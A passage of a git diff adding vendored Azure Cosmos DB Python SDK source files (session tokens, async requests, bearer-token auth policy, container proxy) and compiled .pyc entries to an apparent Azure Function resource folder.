modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Internal Helper functions in the Azure Cosmos database service. +""" + +import platform +import re +from ._version import VERSION + + +def get_user_agent(): + os_name = safe_user_agent_header(platform.platform()) + python_version = safe_user_agent_header(platform.python_version()) + user_agent = "azsdk-python-cosmos/{} Python/{} ({})".format(VERSION, python_version, os_name) + return user_agent + + +def get_user_agent_async(): + os_name = safe_user_agent_header(platform.platform()) + python_version = safe_user_agent_header(platform.python_version()) + user_agent = "azsdk-python-cosmos-async/{} Python/{} ({})".format(VERSION, python_version, os_name) + return user_agent + + +def safe_user_agent_header(s): + if s is None: + s = "unknown" + # remove all white spaces + s = re.sub(r"\s+", "", s) + if not s: + s = "unknown" + return s diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_vector_session_token.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_vector_session_token.py new file mode 100644 index 0000000..82ddb17 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_vector_session_token.py @@ -0,0 +1,175 @@ +# The MIT License (MIT) +# Copyright (c) 2018 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Session Consistency Tracking in the Azure Cosmos database service. +""" + +from . import exceptions +from .http_constants import StatusCodes + + +class VectorSessionToken(object): + segment_separator = "#" + region_progress_separator = "=" + + def __init__(self, version, global_lsn, local_lsn_by_region, session_token=None): + + self.version = version + self.global_lsn = global_lsn + self.local_lsn_by_region = local_lsn_by_region + self.session_token = session_token + + if self.session_token is None: + region_and_local_lsn = [] + + for key in self.local_lsn_by_region: + region_and_local_lsn.append( + str(key) + self.region_progress_separator + str(self.local_lsn_by_region[key]) + ) + + region_progress = self.segment_separator.join(region_and_local_lsn) + if not region_progress: + self.session_token = "%s%s%s" % (self.version, self.segment_separator, self.global_lsn) + else: + self.session_token = "%s%s%s%s%s" % ( + self.version, + self.segment_separator, + self.global_lsn, + self.segment_separator, + region_progress, + ) + + @classmethod + def create(cls, session_token): # pylint: disable=too-many-return-statements + """Parses session token and creates the vector session token + + :param str session_token: + :return: A Vector session Token + :rtype: VectorSessionToken + """ + + version = None + global_lsn = None + local_lsn_by_region = {} + + if not session_token: + return None + + segments = session_token.split(cls.segment_separator) + + if len(segments) < 2: + return None + + try: + version = int(segments[0]) + except ValueError as _: + return None + + try: + global_lsn = int(segments[1]) + except ValueError as _: + return None + + for i in range(2, len(segments)): + region_segment = segments[i] + region_id_with_lsn = region_segment.split(cls.region_progress_separator) + + if len(region_id_with_lsn) != 2: + return None + + try: + region_id = int(region_id_with_lsn[0]) + local_lsn = int(region_id_with_lsn[1]) + except ValueError as _: + return None + local_lsn_by_region[region_id] = local_lsn + + return VectorSessionToken(version, global_lsn, local_lsn_by_region, session_token) + + def equals(self, other): + if other is None: + return False + return ( + self.version == other.version + and self.global_lsn == other.global_lsn + and self.are_region_progress_equal(other.local_lsn_by_region) + ) + + def merge(self, other): + if other is None: + raise ValueError("Invalid Session Token (should not be None)") + + if self.version == other.version and len(self.local_lsn_by_region) != len(other.local_lsn_by_region): + raise exceptions.CosmosHttpResponseError( + status_code=StatusCodes.INTERNAL_SERVER_ERROR, + message=("Compared session tokens '%s' and '%s' have unexpected regions." + % (self.session_token, other.session_token)) + ) + + if self.version < other.version: + session_token_with_lower_version = self + session_token_with_higher_version = other + else: + session_token_with_lower_version = other + session_token_with_higher_version = self + + highest_local_lsn_by_region = {} + + for key in session_token_with_higher_version.local_lsn_by_region: + region_id = key + local_lsn1 = session_token_with_higher_version.local_lsn_by_region[key] + local_lsn2 = ( + session_token_with_lower_version.local_lsn_by_region[region_id] + if region_id in session_token_with_lower_version.local_lsn_by_region + else None + ) + + if local_lsn2 is not None: + highest_local_lsn_by_region[region_id] = max(local_lsn1, local_lsn2) + elif self.version == other.version: + raise exceptions.CosmosHttpResponseError( + status_code=StatusCodes.INTERNAL_SERVER_ERROR, + message=("Compared session tokens '%s' and '%s' have unexpected regions." + % (self.session_token, other.session_token)) + ) + else: + highest_local_lsn_by_region[region_id] = local_lsn1 + + return VectorSessionToken( + max(self.version, other.version), max(self.global_lsn, other.global_lsn), highest_local_lsn_by_region + ) + + def convert_to_string(self): + return self.session_token + + def are_region_progress_equal(self, other): + if len(self.local_lsn_by_region) != len(other): + return False + + for key in self.local_lsn_by_region: + region_id = key + local_lsn1 = self.local_lsn_by_region[region_id] + local_lsn2 = other[region_id] if region_id in other else None + + if local_lsn2 is not None: + if local_lsn1 != local_lsn2: + return False + return True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_version.py new file mode 100644 index 0000000..6f4a741 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_version.py @@ -0,0 +1,22 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +VERSION = "4.3.0" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__init__.py new file mode 100644 index 0000000..1e73a22 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__init__.py @@ -0,0 +1,34 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +from ._container import ContainerProxy +from ._cosmos_client import CosmosClient +from ._database import DatabaseProxy +from ._user import UserProxy +from ._scripts import ScriptsProxy + +__all__ = ( + "CosmosClient", + "DatabaseProxy", + "ContainerProxy", + "ScriptsProxy", + "UserProxy" +) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b540282 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_asynchronous_request.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_asynchronous_request.cpython-39.pyc new file mode 100644 index 0000000..f98e7b0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_asynchronous_request.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_auth_policy_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_auth_policy_async.cpython-39.pyc new file mode 100644 index 0000000..c760425 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_auth_policy_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_container.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_container.cpython-39.pyc new file mode 100644 index 0000000..84b95bc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_container.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client.cpython-39.pyc new file mode 100644 index 0000000..60ea135 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client_connection_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client_connection_async.cpython-39.pyc new file mode 100644 index 0000000..66fa7ca Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_cosmos_client_connection_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_database.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_database.cpython-39.pyc new file mode 100644 index 0000000..11320bf Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_database.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_global_endpoint_manager_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_global_endpoint_manager_async.cpython-39.pyc new file mode 100644 index 0000000..dee1eaa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_global_endpoint_manager_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_query_iterable_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_query_iterable_async.cpython-39.pyc new file mode 100644 index 0000000..4da3946 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_query_iterable_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_retry_utility_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_retry_utility_async.cpython-39.pyc new file mode 100644 index 0000000..349d140 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_retry_utility_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_scripts.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_scripts.cpython-39.pyc new file mode 100644 index 0000000..3771ae7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_scripts.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_user.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_user.cpython-39.pyc new file mode 100644 index 0000000..c77f326 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/__pycache__/_user.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_asynchronous_request.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_asynchronous_request.py new file mode 100644 index 0000000..1ba1578 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_asynchronous_request.py @@ -0,0 +1,184 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Asynchronous request in the Azure Cosmos database service. +""" + +import json +import time + +from urllib.parse import urlparse +from azure.core.exceptions import DecodeError # type: ignore + +from .. import exceptions +from .. import http_constants +from . import _retry_utility_async +from .._synchronized_request import _request_body_from_data + + +async def _Request(global_endpoint_manager, request_params, connection_policy, pipeline_client, request, **kwargs): + """Makes one http request using the requests module. + + :param _GlobalEndpointManager global_endpoint_manager: + :param dict request_params: + contains the resourceType, operationType, endpointOverride, + useWriteEndpoint, useAlternateWriteEndpoint information + :param documents.ConnectionPolicy connection_policy: + :param azure.core.PipelineClient pipeline_client: + Pipeline client to process the request + :param azure.core.HttpRequest request: + The request object to send through the pipeline + :return: tuple of (result, headers) + :rtype: tuple of (dict, dict) + + """ + # pylint: disable=protected-access + + connection_timeout = connection_policy.RequestTimeout + connection_timeout = kwargs.pop("connection_timeout", connection_timeout / 1000.0) + + # Every request tries to perform a refresh + client_timeout = kwargs.get('timeout') + start_time = time.time() + await global_endpoint_manager.refresh_endpoint_list(None, **kwargs) + if client_timeout is not None: + kwargs['timeout'] = client_timeout - (time.time() - start_time) + if kwargs['timeout'] <= 0: + raise exceptions.CosmosClientTimeoutError() + + if request_params.endpoint_override: + base_url = request_params.endpoint_override + else: + base_url = global_endpoint_manager.resolve_service_endpoint(request_params) + if base_url != pipeline_client._base_url: + request.url = request.url.replace(pipeline_client._base_url, base_url) + + parse_result = urlparse(request.url) + + # The requests library now expects header values to be strings only starting 2.11, + # and will raise an error on validation if they are not, so casting all header values to strings. + request.headers.update({header: str(value) for header, value in request.headers.items()}) + + # We are disabling the SSL verification for local emulator(localhost/127.0.0.1) or if the user + # has explicitly specified to disable SSL verification. + is_ssl_enabled = ( + parse_result.hostname != "localhost" + and parse_result.hostname != "127.0.0.1" + and not connection_policy.DisableSSLVerification + ) + + if connection_policy.SSLConfiguration or "connection_cert" in kwargs: + ca_certs = connection_policy.SSLConfiguration.SSLCaCerts + cert_files = (connection_policy.SSLConfiguration.SSLCertFile, connection_policy.SSLConfiguration.SSLKeyFile) + response = await _PipelineRunFunction( + pipeline_client, + request, + connection_timeout=connection_timeout, + connection_verify=kwargs.pop("connection_verify", ca_certs), + connection_cert=kwargs.pop("connection_cert", cert_files), + **kwargs + ) + else: + response = await _PipelineRunFunction( + pipeline_client, + request, + connection_timeout=connection_timeout, + # If SSL is disabled, verify = false + connection_verify=kwargs.pop("connection_verify", is_ssl_enabled), + **kwargs + ) + + response = response.http_response + headers = dict(response.headers) + + data = response.body() + if data: + data = data.decode("utf-8") + + if response.status_code == 404: + raise exceptions.CosmosResourceNotFoundError(message=data, response=response) + if response.status_code == 409: + raise exceptions.CosmosResourceExistsError(message=data, response=response) + if response.status_code == 412: + raise exceptions.CosmosAccessConditionFailedError(message=data, response=response) + if response.status_code >= 400: + raise exceptions.CosmosHttpResponseError(message=data, response=response) + + result = None + if data: + try: + result = json.loads(data) + except Exception as e: + raise DecodeError( + message="Failed to decode JSON data: {}".format(e), + response=response, + error=e) + + return result, headers + + +async def _PipelineRunFunction(pipeline_client, request, **kwargs): + # pylint: disable=protected-access + + return await pipeline_client._pipeline.run(request, **kwargs) + +async def AsynchronousRequest( + client, + request_params, + global_endpoint_manager, + connection_policy, + pipeline_client, + request, + request_data, + **kwargs +): + """Performs one asynchronous http request according to the parameters. + + :param object client: Document client instance + :param dict request_params: + :param _GlobalEndpointManager global_endpoint_manager: + :param documents.ConnectionPolicy connection_policy: + :param azure.core.PipelineClient pipeline_client: PipelineClient to process the request. + :param str method: + :param str path: + :param (str, unicode, file-like stream object, dict, list or None) request_data: + :param dict query_params: + :param dict headers: + :return: tuple of (result, headers) + :rtype: tuple of (dict dict) + """ + request.data = _request_body_from_data(request_data) + if request.data and isinstance(request.data, str): + request.headers[http_constants.HttpHeaders.ContentLength] = len(request.data) + elif request.data is None: + request.headers[http_constants.HttpHeaders.ContentLength] = 0 + + # Pass _Request function with it's parameters to retry_utility's Execute method that wraps the call with retries + return await _retry_utility_async.ExecuteAsync( + client, + global_endpoint_manager, + _Request, + request_params, + connection_policy, + pipeline_client, + request, + **kwargs + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_auth_policy_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_auth_policy_async.py new file mode 100644 index 0000000..be808a2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_auth_policy_async.py @@ -0,0 +1,175 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +import asyncio +import time + +from typing import Any, Awaitable, Optional, Dict, Union +from azure.core.pipeline.policies import AsyncHTTPPolicy +from azure.core.credentials import AccessToken +from azure.core.pipeline import PipelineRequest, PipelineResponse +from azure.cosmos import http_constants + + +async def await_result(func, *args, **kwargs): + """If func returns an awaitable, await it.""" + result = func(*args, **kwargs) + if hasattr(result, "__await__"): + # type ignore on await: https://github.com/python/mypy/issues/7587 + return await result # type: ignore + return result + + +class _AsyncCosmosBearerTokenCredentialPolicyBase(object): + """Base class for a Bearer Token Credential Policy. + + :param credential: The credential. + :type credential: ~azure.core.credentials.TokenCredential + :param str scopes: Lets you specify the type of access needed. + """ + + def __init__(self, credential, *scopes, **kwargs): # pylint:disable=unused-argument + # type: (TokenCredential, *str, **Any) -> None + super(_AsyncCosmosBearerTokenCredentialPolicyBase, self).__init__() + self._scopes = scopes + self._credential = credential + self._token = None # type: Optional[AccessToken] + self._lock = asyncio.Lock() + + @staticmethod + def _enforce_https(request): + # type: (PipelineRequest) -> None + + # move 'enforce_https' from options to context so it persists + # across retries but isn't passed to a transport implementation + option = request.context.options.pop("enforce_https", None) + + # True is the default setting; we needn't preserve an explicit opt in to the default behavior + if option is False: + request.context["enforce_https"] = option + + enforce_https = request.context.get("enforce_https", True) + if enforce_https and not request.http_request.url.lower().startswith("https"): + raise ValueError( + "Bearer token authentication is not permitted for non-TLS protected (non-https) URLs." + ) + + @staticmethod + def _update_headers(headers, token): + # type: (Dict[str, str], str) -> None + """Updates the Authorization header with the cosmos signature and bearer token. + This is the main method that differentiates this policy from core's BearerTokenCredentialPolicy and works + to properly sign the authorization header for Cosmos' REST API. For more information: + https://docs.microsoft.com/rest/api/cosmos-db/access-control-on-cosmosdb-resources#authorization-header + + :param dict headers: The HTTP Request headers + :param str token: The OAuth token. + """ + headers[http_constants.HttpHeaders.Authorization] = "type=aad&ver=1.0&sig={}".format(token) + + @property + def _need_new_token(self) -> bool: + return not self._token or self._token.expires_on - time.time() < 300 + + +class AsyncCosmosBearerTokenCredentialPolicy(_AsyncCosmosBearerTokenCredentialPolicyBase, AsyncHTTPPolicy): + """Adds a bearer token Authorization header to requests. + + :param credential: The credential. + :type credential: ~azure.core.TokenCredential + :param str scopes: Lets you specify the type of access needed. + :raises ValueError: If https_enforce does not match with endpoint being used. + """ + + async def on_request(self, request: "PipelineRequest") -> None: # pylint:disable=invalid-overridden-method + """Adds a bearer token Authorization header to request and sends request to next policy. + + :param request: The pipeline request object to be modified. + :type request: ~azure.core.pipeline.PipelineRequest + :raises: :class:`~azure.core.exceptions.ServiceRequestError` + """ + self._enforce_https(request) # pylint:disable=protected-access + + if self._token is None or self._need_new_token: + async with self._lock: + # double check because another coroutine may have acquired a token while we waited to acquire the lock + if self._token is None or self._need_new_token: + self._token = await self._credential.get_token(*self._scopes) + self._update_headers(request.http_request.headers, self._token.token) + + async def authorize_request(self, request: "PipelineRequest", *scopes: str, **kwargs: "Any") -> None: + """Acquire a token from the credential and authorize the request with it. + + Keyword arguments are passed to the credential's get_token method. The token will be cached and used to + authorize future requests. + + :param ~azure.core.pipeline.PipelineRequest request: the request + :param str scopes: required scopes of authentication + """ + async with self._lock: + self._token = await self._credential.get_token(*scopes, **kwargs) + self._update_headers(request.http_request.headers, self._token.token) + + async def send(self, request: "PipelineRequest") -> "PipelineResponse": + """Authorize request with a bearer token and send it to the next policy + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + await await_result(self.on_request, request) + try: + response = await self.next.send(request) + await await_result(self.on_response, request, response) + except Exception: # pylint:disable=broad-except + handled = await await_result(self.on_exception, request) + if not handled: + raise + else: + if response.http_response.status_code == 401: + self._token = None # any cached token is invalid + if "WWW-Authenticate" in response.http_response.headers: + request_authorized = await self.on_challenge(request, response) + if request_authorized: + try: + response = await self.next.send(request) + await await_result(self.on_response, request, response) + except Exception: # pylint:disable=broad-except + handled = await await_result(self.on_exception, request) + if not handled: + raise + + return response + + async def on_challenge(self, request: "PipelineRequest", response: "PipelineResponse") -> bool: + """Authorize request according to an authentication challenge + + This method is called when the resource provider responds 401 with a WWW-Authenticate header. + + :param ~azure.core.pipeline.PipelineRequest request: the request which elicited an authentication challenge + :param ~azure.core.pipeline.PipelineResponse response: the resource provider's response + :returns: a bool indicating whether the policy should send the request + """ + # pylint:disable=unused-argument,no-self-use + return False + + def on_response(self, request: PipelineRequest, response: PipelineResponse) -> Union[None, Awaitable[None]]: + """Executed after the request comes back from the next policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + def on_exception(self, request: PipelineRequest) -> None: + """Executed when an exception is raised while executing the next policy. + + This method is executed inside the exception handler. + + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + # pylint: disable=no-self-use,unused-argument + return diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_container.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_container.py new file mode 100644 index 0000000..e1911d0 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/aio/_container.py @@ -0,0 +1,762 @@ +# The MIT License (MIT) +# Copyright (c) 2021 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Create, read, update and delete items in the Azure Cosmos DB SQL API service. +""" + +from typing import Any, Dict, Optional, Union, cast, Awaitable +from azure.core.async_paging import AsyncItemPaged + +from azure.core.tracing.decorator import distributed_trace +from azure.core.tracing.decorator_async import distributed_trace_async # type: ignore + +from ._cosmos_client_connection_async import CosmosClientConnection +from .._base import build_options as _build_options, validate_cache_staleness_value +from ..exceptions import CosmosResourceNotFoundError +from ..http_constants import StatusCodes +from ..offer import ThroughputProperties +from ._scripts import ScriptsProxy +from ..partition_key import NonePartitionKeyValue + +__all__ = ("ContainerProxy",) + + +# pylint: disable=protected-access +# pylint: disable=missing-client-constructor-parameter-credential,missing-client-constructor-parameter-kwargs + +class ContainerProxy(object): + """An interface to interact with a specific DB Container. + + This class should not be instantiated directly. Instead, use the + :func:`~azure.cosmos.aio.database.DatabaseProxy.get_container_client` method to get an existing + container, or the :func:`~azure.cosmos.aio.database.DatabaseProxy.create_container` method to create a + new container. + + A container in an Azure Cosmos DB SQL API database is a collection of + documents, each of which is represented as an Item. + + :ivar str id: ID (name) of the container + :ivar str session_token: The session token for the container. + """ + + def __init__( + self, + client_connection: CosmosClientConnection, + database_link: str, + id: str, # pylint: disable=redefined-builtin + properties: Dict[str, Any] = None + ) -> None: + self.client_connection = client_connection + self.id = id + self._properties = properties + self.database_link = database_link + self.container_link = u"{}/colls/{}".format(database_link, self.id) + self._is_system_key = None + self._scripts: Optional[ScriptsProxy] = None + + def __repr__(self) -> str: + return "".format(self.container_link)[:1024] + + async def _get_properties(self) -> Dict[str, Any]: + if self._properties is None: + self._properties = await self.read() + return self._properties + + @property + async def is_system_key(self) -> bool: + if self._is_system_key is None: + properties = await self._get_properties() + self._is_system_key = ( + properties["partitionKey"]["systemKey"] if "systemKey" in properties["partitionKey"] else False + ) + return cast('bool', self._is_system_key) + + @property + def scripts(self) -> ScriptsProxy: + if self._scripts is None: + self._scripts = ScriptsProxy(self, self.client_connection, self.container_link) + return cast('ScriptsProxy', self._scripts) + + def _get_document_link(self, item_or_link: Union[Dict[str, Any], str]) -> str: + if isinstance(item_or_link, str): + return 